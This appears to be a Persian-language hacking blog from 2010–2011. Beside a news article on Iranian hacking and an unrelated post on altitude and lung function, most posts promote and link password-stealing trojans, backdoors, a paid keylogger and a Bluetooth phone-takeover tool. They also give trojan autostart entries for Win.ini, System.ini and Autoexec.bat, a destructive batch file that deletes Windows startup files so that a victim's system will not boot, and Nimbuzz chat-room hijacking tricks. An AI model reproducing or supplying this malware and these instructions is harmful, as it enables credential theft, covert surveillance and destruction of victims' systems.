tarfandsara

nimbuzz

ايراني ها از برترين هكرهاي دنيا هستند

جام جم آنلاين: هک کردن 500 سايت به طور همزمان، نفوذ به شبکه هاي اطلاعاتي سازمانهاي دولتي و خصوصي و ايجاد اختلال در دسترسي کاربران به اطلاعلات سايتها باعث شده است تا نام ايران در ميان 50 کشور برتر در زمينه هک سايت ها قرار گيرد.

به گزارش مهر ، در پروژه جديد گروه امنيتي آشيانه که سابقه جنگ هاي سايبري عليه مواضع رژيم صهيونيستي را دارند، حدود 100 سايت رژيم صهيونيستي که اکثرا سايتهاي مهم دولتي و سايتهاي شرکتها و کمپاني هاي آن هستند هک و چهره تمامي اين سايتها به صفحه اي با نماد ايران تغيير پيدا کرد.

اين گروه در اين پروژه که هدف از آن را محکوم کردن جنايات رژيم صهيونيستي در کشورهاي لبنان و فلسطين عنوان کردند به دو سرور رژيم صهيونيستي نفوذ کردند و پس از پنج روز فعاليت شبانه روزي آيه «فان حزب ا.. هم الغالبون» را در کليه وب سايتهاي رژيم اشغالگر قدس قرار دادند.

اقدامات اين گروه هرچند اعلام موضع ايران را نسبت به اين رژيم است ولي کارشناسان کشور با توجه به پايين بودن ضريب امنيتي سايتهاي دولتي و خصوصي ابراز نگراني کردند.

آنها با استناد به آمارهاي جرائم رايانه اي از کشف حدود 67 مورد مشکوک جرم رايانه اي توسط گشتهاي اينترنتي در سال گذشته خبر داده و اعلام کردند که سهم سايتهاي دولتي از نفوذ غيرمجاز اينترنتي در سال 87 ، 31 درصد و سايتهاي غيردولتي 69 درصد است. اين متخصصان نسبت به نفوذ هکرها به اطلاعات هشدار داده اند.

توسعه خدمات الکترونيکي در غياب امنيت اطلاعات

دانشجويان با نفوذ به سايت دانشگاه پيام نور، توانستند نمره هاي خود را تغيير دهند.اين موضوع باعث واکنش وزارت علوم براي امن کردن سايت هاي دانشگاهي شد. البته بعدها گفته شد اين خبر کذب بوده اما مي تواند زنگ خبر باشد.

سايت يکي از بانکهاي کشور توسط گروه ISCN هک شد. اين گروه با قرار دادن صفحه index.htm در شاخه اصلي سايت امکان دسترسي کاربران به صفحات بانک را مسدود کردند.

سايت ماهنامه دنياي کامپيوتر و ارتباطات دستکاري شد. کاربران با مراجعه به سايت ماهنامه به آدرس www.ccwmagazine.com با پيغامي مبني بر هک شدن سايت روبرو شدند که مانع دسترسي به صفحات اين سايت مي‌شد.هکر يا هکرها، خود را با نام «گروه مافيا» معرفي کردند.

سازمان فضايي ايران به آدرس اينترنتي http://www.isa.ir توسط يک گروه هکري از ايران به نام Persian Boys مورد حمله قرار گرفت.

اينها تنها بخشي از اخبار حملات سايبري است که با عناويني چون جنگ سايبري و هک از آن ياد مي شود. تولد اين مولود ناميمون زماني علني شد که دالايي لاما رهبر معنوي تبتي ها از گروهي از محققان دانشگاه کانادا خواست تا علل بد کار کردن کامپيوترهاي اين دفتر را بررسي کنند. هيچکس فکر نمي کرد اين بررسي ساده به کشف بزرگترين شبکه جاسوسي کامپيوتري تاريخ منجر شود. در اين بررسيها نه تنها شواهدي دال بر رسوخ ويروسهاي جاسوسي به کامپيوترهاي دفتر دالايي لاما به دست آمد بلکه تيم تحقيق موفق به شناسايي شبکه اي شد که بيش از هزار و 300 کامپيوتر در ادارات دولتي و مراکز تحقيقاتي در 103 کشور را تحت کنترل خود درآورده بودند.

اين عمليات گسترده جاسوسي در سال 2004 ميلادي و با ارسال نامه هاي الکترونيک ناشناخته و مبهم براي برخي نهادها شکل گرفت. نامه هاي الکترونيک ارسالي حاوي فايلهاي اجرايي بودند که بلافاصله پس از باز شدن نامه به سيستم عامل کامپيوتر هدف رسوخ کرده و احتمال نفوذ سهل و آسان هکرها به آن را فراهم مي آورد.

نفوذ در شبکه هاي اطلاعاتي منحصر به اين گروه نبود بلکه در ساير کشورها از جمله ايران فعاليتهايي در زمينه هک سايتها آغاز شد و براي آشنا کردن دنيا با موفقيتهاي اين گروهها، سايتي به نام Zone-h راه اندازي شد.

با راه اندازي اين سايت کليه سايتهايي که در اينترنت مورد حمله قرار مي گيرند توسط اين سايت رديابي و بررسي مي شوند و فهرست پايگاههاي hack شده در اين سايت قرار مي گيرند.

طبق آمارهاي ارائه شده در اين سايت 7 تيم از ?? تيم برتر دنيا، تيمهاي ايراني هستند که توانستند به برخي از سايتهاي دولتي و غيردولتي نفوذ کنند.

وضعيت قرمز امنيت اطلاعات در ايران

پاشا ناصرآبادي دبير همايش امنيت و دولت الکترونيک در گفتگو با خبرنگار مهر با تاکيد بر اينکه ايران از نظر امينت اطلاعات در وضعيت مناسبي قرار ندارد، گفت: استفاده از CMS هاي (سامانه هاي مديريتي) مجاني متن باز (Open source) و بي توجهي نسبت به روز کردن نرم افزارها از سوي سازمانها باعث شده است تا حفره هاي امنيتي گسترش يابند. از اين رو سايتهاي بسياري از سازمانها دستخوش حملات سايبري قرار مي گيرند.

وي با بيان اينکه تاکنون کشور از آسيبهاي حملات سايبري در امان بوده است، ادامه داد: با توجه به اقداماتي که در زمينه هک برخي از سايتهاي رژيم اشغالگر قدس از سوي هکرهاي ايراني انجام شد، نشان مي دهد که کشور پتانسيل نفوذ در شبکه هاي اطلاعاتي را دارد.

ناصرآبادي به مشخصات سايتهاي هک شده اشاره کرد و اظهار داشت: هميشه کاربران از هک شدن يک سايت مطلع نمي شوند چرا که گاهي هک براي يک دقيقه است و يا مثلا در ساعت 24 اتفاق مي افتد که بلافاصله براي رفع آن اقدام مي شود. ولي با مراجعه با سايت Zone-h مي توان از هک شدن سايتها در دنيا مطلع شد.

وي با اشاره به برخي از اخبار در زمينه هک همزمان 500 سايت گفت: معمولا بر روي يک سرور بيش از 400 سايت قرار دارد و اگر حتي يکي از اين سايتها از نظر امنيتي مشکل داشته باشند به راحتي مي توان همه سايتها را هک کرد.

اين کارشناس امنيت اطلاعات با اشاره به اقدام دولت در زمينه ارائه خدمات الکترونيکي اضافه کرد: ما هيچ چاره اي به جز الکترونيکي کردن خدمات نداريم، از اين رو بايد قبل از هر چيز زيرساختهاي امنيتي سايتها را فراهم کنيم.

عادت به استفاده از خدمات رايگان و ارزان

دکتر حميدرضا ضيايي پرور کارشناس حوزه فناوري اطلاعات نيز با بيان اينکه هر هفته تعدادي از سايت هاي ايراني توسط هکرهاي داخلي و خارجي هک مي شوند، اضافه كرد: ايراني ها عادت به استفاده از نرم افزارهاي قفل شکسته و رايگان دارند که بيشترين آسيب هايي که در حوزه حملات سايبري متوجه سايتهاي ايراني است به دليل اين عادت بد کاربران ايراني است.

وي با اشاره به مهارتهاي کشور در زمينه حملات سايبري گفت: در حال حاضر بيش از 200 هزار سايت فعال فارسي راه اندازي شده است ولي مسئولان کشور اقدام اساسي در زمينه مقابله با حملات سايبري که متناسب با رشد IT در کشور باشد انجام نداده اند.

ضيايي پرور هکرها را يک گام جلوتر از متخصصان IT دانست و خاطرنشان کرد: دو سال پيش سايت شهرداري تهران هک شد و مسئولان شهرداري در يک اقدام بسيار شايسته فرد هکر را براي ايجاد امنيت در شبکه استخدام کردند. اين امري است که در دنيا هم وجود دارد چرا که مشاوران دست اندرکاران حوزه IT از بهترين و مشهورترين هکرها انتخاب مي شوند که با توجه به ارتقاي توانمنديهاي هکرهاي ايراني مي توانيم براي مقابله با حملات سايبري از اين افراد استفاده کنيم.  

وي با بيان اينکه برخلاف ساير کشورها، حملات سايبري در کشور بيشتر متوجه سايتهاي دولتي است، گفت: به دليل گسترده نشدن خدمات Online بانکي آسيبهاي حملات سايبري کمتر متوجه خدمات بانکي شده است ولي اگر بخواهيم به اين سمت حرکت کنيم پيش بيني هاي امنيتي در حوزه فناوري اطلاعات بيش از پيش ضروري است.

+ نوشته شده در  Sun 11 Sep 2011ساعت 19:57 PM  توسط foad_0600  | 

با خیال راحت در ارتفاع ورزش کنید

صعود به ارتفاعات به وسیله مکانیزم های متفاوتی که هنوز به طور کامل مشخص نیست عملکرد ریه ها را تحت تاثیر قرار می دهد، تاثیر سطوح مختلف ارتفاع بر عملکرد ریوی مردان ورزشکار توسط محققان تربیت بدنی انجام شده است که می تواند اطلاعات مختلفی را به ورزشکارنی که مجبورند به ارتفاع برود بدهد.

صعود به ارتفاعات به وسیله مکانیزم های متفاوتی که هنوز به طور کامل مشخص نیست عملکرد ریه ها را تحت تاثیر قرار می دهد، تاثیر سطوح مختلف ارتفاع بر عملکرد ریوی مردان ورزشکار توسط محققان تربیت بدنی انجام شده است که می تواند اطلاعات مختلفی را به ورزشکارنی که مجبورند به ارتفاع برود بدهد.

«تاثیر سطوح مختلف ارتفاع بر عملکرد ریوی مردان ورزشکار» توسط مهدی فرموشی (دانشجوی کارشناسی ارشد فیزیولوژی ورزشی)، لطفعلی بلبلی (استادیار دانشگاه محقق اردبیلی)، عباس تقی زاده (استادیار دانشگاه علوم پزشکی اردبیل) و مریم داسگر (دانشجوی کارشناسی ارشد فیزیولوژی ورزشی مورد بررسی قرار گرفت.

در این تحقیق آمده است: ایران با مساحت ١٦٤٨١٩٥ کیلومتر مربع در یک منطقه ی کوهستانی قرار دارد، به نحوی که معادل ٥/٥٤ درصد آن را کوه ها تشکیل می دهند و شهرهای آن نیز ارتفاعات مختلفی دارند.

فشار هوا در روی زمین ثابت نیست. این فشار با تغییرات آب و هوایی، دما و مخصوصا ارتفاع متفاوت است.

کاهش فشار سهمی هر گاز نسبت مستقیم با افزایش ارتفاع دارد و کاهش فشار سهمی اکسیژن با افزایش ارتفاع منجر به کاهش عملکرد ورزشی در ارتفاع می شود که علت آن کم شدن شیب فشار و تاخیر انتقال اکسیژن به بافت ها است.

نخستین اتفاقی که در ارتفاع می افتد افزایش تهویه تنفسی و ضربان قلب است که هم در زمان استراحت و هم در زمان فعالیت زیر بیشینه افزایش می یابند که در پاسخ به کاهش فشار سهمی اکسیژن است و فرد نمی تواند به حداکثر اکسیژن مصرفی خود دست یابد. با قرار گرفتن در شرایط هیپوکسی و هایپرکسی (ارتفاع پایین تر از سطح دریا) بدن واکنش های گوناگون از خود نشان می دهد که زمان آن ممکن است چند دقیقه، چند ساعت یا چند روز به درازا بیانجامد که یکی از واکنش ها تغییرات عملکرد ریوی است و هدف آن حفاظت مدبرانه O۲ برای مغز و دیگر دستگاه های بدن است.

ریه ها به عنوان نخستین میانجی بین اکسیژن محیط و سیستم سوخت و سازی بدن هستند. در هر دو حالت استراحت و ورزش، برای فراهم شدن اکسیژن کافی به بافت ها و دفع CO۲ از آنها، تبادل گازی متناسب و موفق در میان مویرگ های ریوی و حبابچه ها ضروری به نظر می رسد. برای نیل به این هدف، عملکرد مناسب ریه ها (عملکرد مکانیکی شش ها، دیواره ی قفسه سینه و عضلات تنفسی و راه های هوایی)، و تحریک مراکز تنفسی واقع در سیستم عصبی لازم است و هرگونه احساس مشکل در تنفس که مانعی برای افزایش شدت کار است باید حل شود تا نیاز انرژی برطرف شود. به همین منظور است که در ارتفاع تهویه ریوی تناسب بالایی با هزینه ی انرژی دارد و به دلیل فعالیت زیاد عضلات تنفسی و خستگی آن ممکن است عملکرد ریوی دچار اختلال گردد. جهت شناسایی عملکرد ریوی از اندازه گیری حجم ها و ظرفیت های ریوی توسط دستگاه اسپیرومتری (تست های عملکرد ریوی) استفاده می شود.

صعود به ارتفاعات به وسیله مکانیزم های متفاوتی که هنوز به طور کامل مشخص نیست عملکرد ریه ها را تحت تاثیر قرار می دهد ولی با این حال فرضیه هایی نیز در این خصوص وجود دارد؛ مثلا با کاهش تدریجی تراکم هوا در طی صعود، بازدم و تخلیه ی ریوی آسان تر می شود و یا ایجاد خیز ریوی نامحسوس در کاهش ظرفیت حیاتی با فشار (FVC) یک عامل قابل ملاحظه است.

همچنین قدرت و استقامت عضلات تنفسی در تهویه نقش اساسی دارد که ممکن است تحت تاثیر شرایط ارتفاع قرار گیرند و خستگی دیافراگم نیز در اثر بالا رفتن تهویه روی می دهد که می تواند تنفس در ارتفاع و عملکرد ریه را تحت تاثیر خود قرار دهد.

در مجموع در این تحقیق ١٥ مرد ورزشکار و در چهار سطح مختلف ارتفاع تحت آزمون اسپیرومتری قرار گرفتند.

FEF۲۵-۷۵%, FVC, IVC, FEV۱ شاخص های عملکرد ریوی هستند که نشان دهنده ی جریان هوا در راه های هوایی بوده و به قدرت عضلات تنفسی و مقاومت راه های هوایی و برگشت پذیری ریه وابسته هستند. نتایج تحقیق نشان داد که با صعود به ساوالان (ارتفاع ٣٦٠٠ متری) FVC نسبت به اردبیل و سطح دریا کاهش معنی داری یافت که با نتایج علیزاده و همکاران همخوانی دارد ولی با تحقیق شامارا ( ٢٠٠٧) همخوان نیست. باید توجه داشت که احتمالا تفاوت های فردی و تفاوت در عواملی محیطی مثل دما و رطوبت در این تحقیقات می تواند موجب همخوان نشدن نتایج آنها باشد.

کاهش در FVC با افزایش ارتفاع که در این تحقیق نیز مشاهده شد می تواند چنین توجیه شود که هایپوکسی موجب بالاتر رفتن تهویه شده و خستگی عضلات تنفسی را به دنبال می آورد که باعث کاهش FVC می شود و این شبیه به نمای اختلالات محدود کننده ریه است.

در تحقیق حاضر FEF۲۵-۷۵% با کاهش ارتفاع از اردبیل و ساوالان به زیر سطح دریا کاهش معنی داری نشان داد و این نشان می دهد که شرایط هایپرکسی و افزایش فشار جو موجب کاهش در FEF۲۵-۷۵% می گردد که می تواند به نوعی با تحقیقات دبوک و همکاران که نشان دادند با افزایش ارتفاع FEF۲۵-۷۵% افزایش می یابد همخوانی داشته باشد و دلیل آن کاهش راههای مقاومت هوایی در نتیجه کاهش ترشح سرفکتنت می تواند باشد.

افزایش فعالیت سیستم آدرنالین در ارتفاع مسلم است بنابراین سبب کاهش برگشت پذیری ریه ی قابل ارتجاع و همچنین گشاد شدن عروق می شود که همزمان باعث کاهش مقاومت راه های هوایی شده و باید به افزایش میزان جریان هوا گرایش داشته باشد. اینها دلایلی است که می تواند افزایش معنی دار IVC را در ساوالان نسبت به اردبیل و سطح دریا توجیه کند.

+ نوشته شده در  Fri 17 Sep 2010ساعت 11:39 AM  توسط foad_0600  | 

تروجان چگونه کار می کند؟!

تروجان ها چگونه كار می كنند؟

تروجان ها به دو قسمت تقسیم می شوند. یك قسمت Client (خدمات گیرنده) و دیگری Server (خدمات دهنده). وقتی قربانی ندانسته قسمت Server را روی سیستم خودش اجرا می كند. حمله كننده بوسیله قسمت Client با Server كه روی كامپیوتر قربانی است متصل می شود و از آن پس می تواند كنترل سیستم قربانی را در دست بگیرد . پروتكل TCP/IP كه استاندارد معمول برای برقراری ارتباطات است به این تروجان آلوده میشود و تروجان از طریق آن كارش را انجام می دهد. البته لازم به ذكر است كه برخی اعمال تروجانها نیز از پروتكل UDP استفاده می كنند. معمولاً زمانی كه Server روی كامپیوتر قربانی اجرا می شود. خود را در جایی از حافظه مخفی می كند تا پیدا كردن یا تشخیص آن مشكل شود و به برخی درگاههای خاص (Port) گوش می دهد تا ببیند درخواست ارتباطی به سیستم از طرف حمله كننده آمده است یا نه، از طرفی رجیستری را نیز به گونه ای ویرایش می كند كه برخی از اعمال بطور خودكار روی سیستم شروع به كار كنند.

برای نفوذ كننده لازم است كه IP قربانی را بداند برای اینكه بتواند به سیستم او متصل شود. اكثر قریب به اتفاق تروجانها بصورتی برنامه ریزی شده اند كه IP قربانی را برای حمله كننده ارسال می كنند همانند سیستم پیغام گذار از طریق ICQ یا IRS . این زمانی اتفاق می افتد كه قربانی IP دینامیك داشته باشد بدین معنی كه هر زمان به اینترنت متصل میشود و یك IP متفاوت از قبل داشته باشد كه اغلب سیستم هایی كه به روش dial- up به اینترنت متصل می شوند از این قانون پیروی می كنند. كاربران ASDL معمولا IP های ثابت دارند به همین علت IP آلوده شده همواره برای حمله كننده شناخته شده است و این حالت باعث تسهیل درامر اتصال به سیستم قربانی می گردد.

اغلب تروجانها از روش شروع اتوماتیك استفاده می كنند. بصورتی كه اگر شما كامپیوترتان را خاموش كنید آنها قادر خواهند كه فعالیتهایشان را مجددا ً آغاز كنند و دسترسی لازم به حمله كننده را روی سیستم شما بدهند و ساختن تروجانها با قابلیت شروع روشهایی هستند كه همیشه مورد استفاده قرار می گیرند. یكی از این روشها، محلق كردن تروجان به یك فایل اجرایی كه كاربرد زیادی دارد می باشد، به عبارت دیگر محلق نمودن تروجان به یك برنامه پركاربرد ، موجب عملی شدن تفكرات حمله كننده خواهد شد. روشهای شناخته شده نیز همانند دستكاری فایلهای ریجستری ویندوز می تواند به عملی شدن افكار حمله كننده بیانجامد. فایلهای سیستمی ویندوز قرار دارند كه می توانند بهترین انتخابهای حمله كنندگان باشند.

به جهت اینکه دوستان بتوانند سیستم خود را در برابر این حمله ها محافظت نمایند، قسمتهای مختلف ویندوز که می توان از آن استفاده نمود را در اینجا بررسی می کنیم.

پوشه شروع خودكار

پوشه ای كه بصورت خودكار در شروع كار ویندوز فراخوانی می شود و فایلهای داخل آن بصورت اتوماتیك اجرا می شوند در آدرس زیر قرار دارند.


C:\ windows\ start Menu \ programs \startup

البته فرض برای این است كه سیستم عامل ویندوز در درایو C و در شاخه windows نصب شده باشد.

فایل Win.ini

فرمت شروع خودكار در این فایل بصورت زیر می باشد :

Load = Trojan.exe

Run = Trojan.exe

فایل System.ini

فرمت بكارگیری تروجان در این فایل سیستمی بصورت زیر است:

Shell = explorer.exe Trojan.exe

كه باعث می شود بعد از هر بار اجرای Explorer فایل Trojan.exe اجرا شود.


فایل Wininit.ini

این فایل توسط Setup.exe برنامه های نصب شوند مورد استفاده قرار می گیرد.

بدین صورت كه یك بار اجرا شود، قابلیت حذف خودكار را نیز دارد كه برای تروجان ها بسیار سهل می باشد.

Winstart.bat

این فایل دسته ای هم در ابتدای شروع به كار ویندوز فراخوانی شده و فرامین داخل آن به ترتیب اجرای می شوند كه تروجان می تواند با افزودن خط زیر خود را در حافظه بار كند.

@ Trojan.exe

فایل Autoexec.bat

این فایل دسته ای هم از فایلهای معروف فراخوانی شده در ابتدای كار سیستم عامل می باشد كه می توان با دستكاری و اضافه نمودن خط زیر بر آن تروجان مورد نظر را در سیستم قربانی اجرا نمود:

C:\ Trojan.exe

فایل Config.sys

این فایل نیز از معروفترین فایلهای پیكر بندی سیستم است و می تواند در امر اجرای تروجان كاربرد داشته باشد.


 

+ نوشته شده در  Fri 17 Sep 2010ساعت 11:28 AM  توسط foad_0600  | 

برنامه ی هک (Snake Trojan )

فايل سرور به اندازه ۱۸ كيلوبايت : اين فايل بايد به كامپيوتر قرباني فرستاده شود .

     ۲- فايل اديت سرور به اندازه ۵۳ كيلوبايت : كه براي تنظيمات فايل سرور به كار برده مي شود .

     اين تروجان با يك بار اجرا در كامپيوتر قرباني براي هميشه وجود خواهد داشت و با هر بار اتصال به اينترنت پسوردها و  بعضي اطلاعات ديگر را 
 

     از كامپيوتر قرباني به شخصي كه فايل سرور را فرستاده , مي فرستد .   


 

        قابليت هاي Snake Trojan نسخه ۱.۰.۰

 

     ۱ - بدست آوردن پسوردهاي ياهو ﴿ تمامي ويندوزها ﴾ .

     ۲ - بدست آوردن پسورد اكانتهاي اينترنتي ﴿ ويندوز Me ﴾ .

    ۳ - بدست آوردن IP Address ﴿ تمامي ويندوز ها ﴾.

     ۴ - بدست آوردن نام كامپيوتر ﴿ Computer Name ﴾ ﴿ تمامي ويندوزها ﴾ .

     ۵ - تعيين كشور قرباني  ﴿ ويندوز Me  ﴾ .

     ۶ - تعيين شهر قرباني ﴿ ويندوز Me ﴾ .

 

   چگونگي تنظيم فايل سرور

 

     فايل اديت سرور ﴿ Snake Edit Server ﴾ را اجرا كنيد . در پنجره اي كه باز مي شود يكي از زبانها ﴿ فارسي يا انگليسي ﴾ را انتخاب كنيد .

     ۱- Email Address ﴿ آدرس ايميل :در اين قسمت شما بايد ايميل خود را وارد كنيد . اين ايميل , ايميلي خواهد بود كه در فايل سرور ثبت

    خواهد شد و با هر بار اتصال قرباني به اينترنت براي شما اطلاعات كامپيوتر قرباني را خواهد فرستاد .

     ۲- SMTP Server ﴿ ميل سرور ﴾ : در اين قسمت شما بايد سروري را كه به شما سرويس ايميل ميدهد را انتخاب كنيد كه براي Yahoo و

     Hotmail ميتوانيد مستقيما آنها را انتخاب كنيد و برنامه به طور اتوماتيك SMTP Server را در فايل سرور ذخيره خواهد كرد . ولي براي ايميل

    هايي به غير از Yahoo و Hotmail  بايد در قسمت SMTP Server خودتان به صورت دستي ‌SMTP Server مربوطه را وارد كنيد .

      3 -Load Server ﴿ فايل سرور ﴾ :  بر روي دكمه Load Server كليك كرده و فايل سرور را انتخاب كنيد . 

       ۴ - Save ﴿ ذخيره ﴾ : گزينه Save را انتخاب كنيد . ايميل شما در فايل سرور ثبت خواهد شد .

     توجه : تا وقتي كه تمام تنظيمات را در فايل اديت سرور انجام نداده باشيد گزينه Save فعال نخواهد شد .

snake.zip

+ نوشته شده در  Fri 17 Sep 2010ساعت 11:23 AM  توسط foad_0600  | 

هک یاهو

امروز برنامه ياهو اسپاي رو واستون مي ذارم

 اين برنامه حتي از مجيک پي اس هم قويتره، چون که علاوه بر فرستادن

پسورد ياهو ، اين برنامه قابليت فرستادن پسوردهاي Msn - Ftp و از همه مهمتر يوزر ،

پسورد اکانت اينترنت طرف  رو هم داره ...

 

توجه۱ : چنانچه از ياهو مسنجر نسخه ۵ استفاده ميکنيد هنگام Decode کردن رمز احتمال داره که مسنجر شما بطور اتوماتيک با آيدي فردي که هک شده لوگين بشه . شما در اين لحظه بايد بدون اينکه پنجره برنامه Decoder را ببنديد ٬ مسنجر را Logout نماييد و پس از Logout کردن مسنجر ٬ برنامه Decoder رمز عبور آيدي مورد نظر را به شما نشان ميدهد.
توجه۲ : در اين نسخه ٬ برنامه رمز اشتراک اينترنت را نيز ارسال ميکند ولي رمزهايي کساني را ميفرسته که از طريق internet explorer به اينترنت وصل ميشوند و رمزهاي کساني که از کاننکشن ويندوز به اينترنت وصل ميشودن را نميفرسته ولي در نسخه بعدي قابليت ارسال تمامي رمزهاي اشتراک اينترنت هم اضافه ميشه .

قابليتها :
۱- پنهان بودن در Task manager(اولين تروجان ايراني با اين قابليت)
۲- پنهان در برنامه هايي که استارت آپ شما را مونيتور ميکنند  .
۳-قرباني نميتواند آن را به آساني از سيستم خود پاک کند.
۴- هيچ ويروس يابي نميشناسش.
۵- از همه فايروالها رد ميشه.
۶- رمزهاي بدست آمده را به ايميل شما ارسال ميکند.
۷- رمزهاي ياهو مسنجر و Msn , Ftp  , رمز Dialup  را براي شما ميفرسته.
۸- رمزهاي ياد شده را در همان لحظه اجراي برنامه و در کمتر از  ۵  ثانيه ارسال ميکنه.
۹- به تمام سرورهاي ايميل قادره ايميل بفرسته .(Yahoo,Hotmail,Msn,Google,...)
۱۰- وقتي قرباني سعي در پاک کردن آن داشته باشه رجيستري قرباني را غير فعال ميکند.
۱۱- روي تمام ويندوزهاي  ۹۵  به بالا کار ميکنه و حتي روي لانگهورن هم کار ميکنه.
۱۲- روي تمام نسخه هاي ياهو مسنجر کار ميکنه و حتي توپي هاي جاي پسورد ياهو هم تغيير نميده و هيچ جاي شکي به جا نميذاره.
۱۳- غير فعال کردن برخي از برنامه هاي ويروسياب
۱۴- توسط پکر جديدي درست ميشه و هيچ ويروسياب و تروجان ياب و ... نميتونه پيداش کنه.
۱۵- در کمتر از  ۵  ثانيه ايميل را ارسال ميکنه.

حالشو ببر

 

دانلود

+ نوشته شده در  Fri 17 Sep 2010ساعت 11:21 AM  توسط foad_0600  | 

بابلوتوث گوشي طرف مقابل را كنترل كنيد واز گوشي اون تماس بگيريد

نرم افزارSuper Bluetooth Hack
با اين نرم افزار وقتي فقط يک بار با گوشي خود بوسيله ي بلوتوث به گوشي ديگر متصل شويد ميتوانيد :

1 - پيام ها را بخوانيد
2- شماره تلفن ها را مشاهده کنيد
3 - پروفايل ها را تغيير دهيد
4 - زنگ انتخابي را در حالت سکوت پخش کنيد
5 - آهنگ هاي موجود در گوشي را اجرا نماييد
6 - گوشي را خاموش و روشن کنيد
7 - گوشي را کاملا خاموش کنيد
8 - تنظيمات را به حالت کارخانه اي باز گردانيد
9 - از گوشي مقابل به هر شماره اي تماس برقرار نماييد
10 - صداي زنگ را کم يا زياد کنيد


دانلود نرم افزار

+ نوشته شده در  Fri 17 Sep 2010ساعت 11:20 AM  توسط foad_0600  | 

برنامه ی ساخت ویروس

+ نوشته شده در  Fri 17 Sep 2010ساعت 11:4 AM  توسط foad_0600  | 

آموزش ویروس نویسی

 سلام به تمام دوستان. امروز یک ویروسی برای شما گذاشتم که با این ویروس اگه قربانی سیستم خود را ریستارت کند دیگه بالا نمیاد پس کد هایی را که در زیر قرار دادم درست وارد کنید !

توجه : هر گونه استفاده نادرست بر عهده ی وبلاگ نمی باشد .

ابتدا یک  note pad باز کنید سپس کد های زیر را در آن قرار بدید و با پسوند .bat سیو کنید

مثال :hack.bat

کد های ویروس :

C:


 

del autoexec.bat
del config.sys
cd winnt
del system.ini
del win.ini
 

+ نوشته شده در  Fri 17 Sep 2010ساعت 10:55 AM  توسط foad_0600  | 

download id nimbuzz hacker


slam... dostan dar jaryan bashid ke brname hack shayan hacke dar vagha havie poshei ke dar on password va user etlate shoma az jomle yahoo nimbuzz ..... ro ersal mikone be hich onvan downlod nakonid

link in branme dar zire... faght jaht etlaaa mizaram


tanx 1.56 mb

DOWNLOAD FILE  *bra etlea as  doenlod nakonid faght bebinid ke age kas dg ham bton morefi kard dar jaran bashid*** ble dar majmo bishtar az 1000 nafr dl kardan......omidvarm ke hack nashode bashn  + نوشته شده در  Sat 11 Sep 2010ساعت 1:22 AM  توسط foad_0600  | 

  hack ba onvan jid karakter

  ravashe hack idi ba trafande inke : script code ya code xml bara sakhte idi karkter daram

   

   

  faghat makhsose baxe pro

   be edame matla beravid

   

   

  rome ma  iran.iranian.pro

  + نوشته شده در  Mon 30 Aug 2010ساعت 1:17 AM  توسط foad_0600  | 

  hack room jadide jadide( room khali ya bedon idi morde.

  ina hack jadid room nimbuzz

   

  baraie khandan be edame matlab bervid ya be in room biad agar matlab paword dsht

  iran.iranian.pro


  ادامه مطلب
  + نوشته شده در  Mon 30 Aug 2010ساعت 0:58 AM  توسط foad_0600  | 

  هک روم

  ravash jadid hack room

   

  rom ra too nmuzz misaazid albate be sorate prvit

  maslan mikhaid roome iran.iranian.atr ro hac konid

  baidin rom ro beazid

  iran.iranian.atr/ bad be hesh ramzbedid

  2.   rom asli yani bra mesal iran.iranian.atr baid khali va bedone psword bashe

  3. vaghtikhli bod dakhle rom shode va rom hack mishe

   

  Iran.Iranian.Pro

  + نوشته شده در  Sun 15 Aug 2010ساعت 13:49 PM  توسط foad_0600  | 

  hack room chat part 2 new

  tarfand jadid rom zdan ro dar edame matlab bekhanid

  dar zemn zadane rom ba pasword ra ha goftam

   

   

  dar sorati ke matalb pass dare be iran.iranian.pro biaiid

   

   


  ادامه مطلب
  + نوشته شده در  Sat 7 Aug 2010ساعت 23:4 PM  توسط foad_0600  | 

  هک ایدی با تروجان

  با استفاده از این تروجان شما میتوانید آیدی دیگران را هک کنید.

  دانلود---"۰۶۰۰"

  + نوشته شده در  Tue 27 Jul 2010ساعت 18:41 PM  توسط foad_0600  | 

  هکری با برنامه

  ye barname farataraz subseven heyf ke crack nashode

  فراتر از سوب سون

  Console based games like Street Hacker introduce a new form of heart pumping adrenaline which cannot be reproduced outside of this gaming genre. Use brute force generators, port scanners, IP scanners, exploit scripts, Viruses, Worms, & Trojans, to help you hack the streets in 8 of Americans biggest cities. Become a part of this extremely dynamic simulation & choose your own allies in the hacker's war for the world.

 • Download Link 1
 • Download Link 2
 • هک و تروجان و کرک و ویروس
 • + نوشته شده در  Tue 27 Jul 2010ساعت 9:28 AM  توسط foad_0600  | 

  C-One 1.0

  inam ye back doore dg vase hackeraie aziz 

  dostan inam linkesh

  C-One.zip

  + نوشته شده در  Sat 24 Jul 2010ساعت 13:40 PM  توسط foad_0600  | 

  net-devil

  gheimat majani 

  nam netdevil vase hackeraie amator 

  vali az man begirid

  alirat@nimbuzz.com

  source.compiler@yahoo.com

  100% tazmini baraye hack

  + نوشته شده در  Sat 24 Jul 2010ساعت 13:26 PM  توسط foad_0600  | 

  هک

  کیلاگرها برنامه های جاسوسی هستند که به محض اجرا در سیستم قربانی تمام مشخصات و اطلاعات خواسته شده را به هکر مورد نظر میفرستد

   کیلاگر بکس ۰۶۰۰

  قیمت ۵۰۰۰ تومان

  خرید از ایدی ۰۶۰۰

  این کیلاگر میتواند
  ارسال تمام پسورد مسنجرهای معروف مانند:(Hotmail,Yahoo Messenger,MSN,AOL )
  ارسال پسورد و یوزر نیم وارد شده(وبلاگها سایتها تالارهاو....) در تمام مرورگرها
  ارسال متن تایپ شده در تمام مسنجرها ارسال لیست تمام سایتها بازدید شده
  ارسال تمام کلیدی های زده شده با کی برد در هر محیطی
  ارسال مشخصات خواسته در هر دقیقه که شما بخواهید مثلا" هر ۵ دقیقه
  ارسال لیست و نام تمام عکسها و فیلمهای دیده و اپلود  و دانلود شده توسط قربانی


  هم اکنون تماس بگیرد


  ادامه مطلب
  + نوشته شده در  Sat 24 Jul 2010ساعت 12:36 PM  توسط foad_0600  | 

  Blogfa Link

  az chand ta az dostan shenidam ke ba naghshaie jadide blogfa link nemitonan bezaran ba link window ...

  dostane aziz rahe hale shoma daste mast ...

  age negah konid ma dar weblog hamvare link haie download ro darim ...

  pas ma midonim dar naghshaie weblog ba code HTML chetor barkhord konim ...

  age mikhayd yad begirid va moshkelate weblog ,website va hamintor server ro be ma begid ta komaketon konim ...

  maro add konid

  source.compiler@yahoo.com

  alirat@nimbuzz.com

  + نوشته شده در  Sat 24 Jul 2010ساعت 12:5 PM  توسط foad_0600  | 

  ساخت ويروسي خطرناک و سيستم ترکون

  ساخت ويروسي خطرناک و سيستم ترکون
